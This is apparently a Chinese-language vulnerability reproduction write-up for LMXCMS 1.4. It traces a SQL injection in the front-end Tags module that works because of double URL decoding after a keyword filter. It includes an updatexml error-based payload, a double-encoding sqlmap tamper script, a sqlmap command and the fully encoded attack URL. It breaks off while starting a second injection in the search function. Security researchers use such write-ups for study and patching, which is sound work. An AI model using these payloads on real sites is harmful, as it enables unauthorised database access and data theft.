一、环境搭建

1、源码下载：http://www.lmxcms.com/down/

2、phpstorm+xdebug调试环境

3、访问 /install 目录安装

4、安装成功后访问：

二、漏洞复现

1、前台TagsAction.class.php存在sql注入漏洞

class TagsAction extends HomeAction{
private $data;
private $tagsModel = null;
public function __construct() {
parent::__construct();
$data = p(2,1,1);
$name = string::delHtml($data['name']);
if(!$name) _404();
$name = urldecode($name);
if($this->tagsModel == null) $this->tagsModel = new TagsModel();
$this->data = $this->tagsModel->getNameData($name);
if(!$this->data) _404();
}

public function index(){
$temModel = new parse($this->smarty,$this->config);
echo $temModel->tags($this->data,$this->tagsModel);
}
}
?>

转到p函数的声明

function p($type=1,$pe=false,$sql=false,$mysql=false){
if($type == 1){
$data = $_POST;
}else if($type == 2){
$data = $_GET;
}else{
$data = $type;
}
if($sql) filter_sql($data);
if($mysql) mysql_retain($data);
foreach($data as $k => $v){
if(is_array($v)){
$newdata[$k] = p($v,$pe,$sql,$mysql);
}else{
if($pe){
$newdata[$k] = string::addslashes($v); // 在每个('，"，\，NULL)前添加反斜杠
}else{
$newdata[$k] = trim($v);
}
}
}
return $newdata;
}

get方式，if($sql) filter_sql($data);转到filter_sql过滤函数

//过滤非法提交信息，防止sql注入
function filter_sql(array $data){
foreach($data as $v){
if(is_array($v)){
filter_sql($v);
}else{
//转换小写
$v = strtolower($v);
if(preg_match('/count|create|delete|select|update|use|drop|insert|info|from/',$v)){
rewrite::js_back('【'.$v.'】数据非法');
}
}
}
}

跟踪getNameData函数

//根据Tags名字返回id
public function getNameData($name){
$param['where'] = "name = '$name'";
return parent::oneModel($param);
}

跟踪oneModel函数

//获取一条数据
protected function oneModel($param){
return parent::oneDB($this->tab['0'],$this->field,$param);
}

跟踪oneDB函数

protected function oneDB($tab,Array $field,Array $param){
$field = implode(',',$field);
$force = '';
//强制进入某个索引
if($param['force']) $force = ' force index('.$param['force'].')';
if($param['ignore']) $force = ' ignore index('.$param['ignore'].')';
$We = $this->where($param);
$sql="SELECT ".$field." FROM ".DB_PRE."$tab$force $We limit 1";

//echo $sql;

$result=$this->query($sql);
$data = mysql_fetch_assoc($result);
return $data ? $data : array();
}

访问：http://127.0.0.1/lmxcms1.4/index.php?m=Tags&name=1，输出sql语句为：SELECT * FROM lmx_tags WHERE name = '1' limit 1

传入name参数-->url解码-->filter_sql过滤-->url二次解码

利用方式：payload url编码-->url编码

报错注入：1' and updatexml(0,concat(0x7e,user()),1)#

url编码脚本

# sqlmap/tamper/urlencode.py
​
import urllib.parse
from lib.core.enums import PRIORITY
​
__priority__ = PRIORITY.LOWEST

def dependencies():
pass

import urllib.parse  

def tamper(payload, **kwargs):  
"""  
对payload进行URL编码的tamper函数。  

:param payload: 需要编码的原始payload字符串  
:param kwargs: 额外的关键字参数（本函数不使用，但保留以兼容sqlmap的接口）  
:return: URL编码后的payload字符串  
"""  
# 使用urllib.parse.quote进行URL编码，确保参数是字符串类型  
if isinstance(payload, str):  
encoded_payload = urllib.parse.quote(payload)  
enencoded_payload = urllib.parse.quote(encoded_payload)
return enencoded_payload

使用sqlmap：python sqlmap.py -u "http://127.0.0.1/lmxcms1.4/index.php?m=Tags&name=1" -p "name" --proxy "http://127.0.0.1:8080" --tamper=urlencode.py

使用xdebug+phpstorm调试

http://127.0.0.1/lmxcms1.4/index.php?m=Tags&name=%25%33%31%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%37%35%25%37%30%25%36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%31%25%32%39%25%32%33?XDEBUG_SESSION_START=16408

传入二次url编码后name=%31%27%20%61%6e%64%20%75%70%64%61%74%65%78%6d%6c%28%30%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%75%73%65%72%28%29%29%2c%31%29%23

经过urldecode函数解码后，name=1' and updatexml(0,concat(0x7e,user()),1)#

2、前台SearchAction.class.php存在sql注入漏洞

首页有一个搜索框

搜索后url：